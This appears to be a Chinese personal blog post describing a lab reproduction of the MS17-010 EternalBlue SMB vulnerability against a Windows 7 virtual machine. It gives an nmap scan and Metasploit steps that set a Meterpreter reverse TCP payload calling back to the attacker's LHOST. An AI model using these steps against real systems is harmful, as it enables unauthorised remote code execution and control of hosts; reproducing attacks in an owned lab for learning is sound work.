MS17-010 永恒之蓝

发布于 2021-08-06  69 次阅读


第一次复现漏洞,那必须是永恒之蓝!!!

漏洞描述

永恒之蓝,Eternalblue,漏洞编号:ms17-010,它是基于445端口和139端口针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码

影响版本

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境

系统IP地址
攻击机Kali Linux192.168.138.129
目标机windows 7 x64192.168.138.130

复现过程

  • 信息收集
    • 确保攻击机能够正常访问靶机
image-20210303174135029
  • nmap探测目标机445端口是否开放​ 命令:nmap -p 445 192.168.138.130
image-20210303174731637
  • 使用MSF进行具体攻击
    • 打开MSF命令:msfconsole
    • 搜索ms17-010模块命令:search ms17-010auxiliary是辅助模块,检测是否存在该漏洞exploit是攻击模块,使用EXP对其进行攻击
    • 使用auxiliary对其进行检测经过探测,很有可能存在永恒之蓝漏洞
    • 使用exploit攻击模块在使用exploit模块时,要注意选择合适的版本,有的版本是适用于windows_8及其以上的
      • set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
      • show options :使用该命令会列出使用当前模块所需呀配置的参数
      • set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
image-20210303181741216
      • set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
      • set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
      • run:开始攻击
image-20210303182210180
  • 一般来说出现很多[+]脚本基本执行成功
    • 验证脚本
image-20210303182350102

哈哈哈哈哈哈,复现的第一个漏洞,成功了心里有种说不出来的高兴!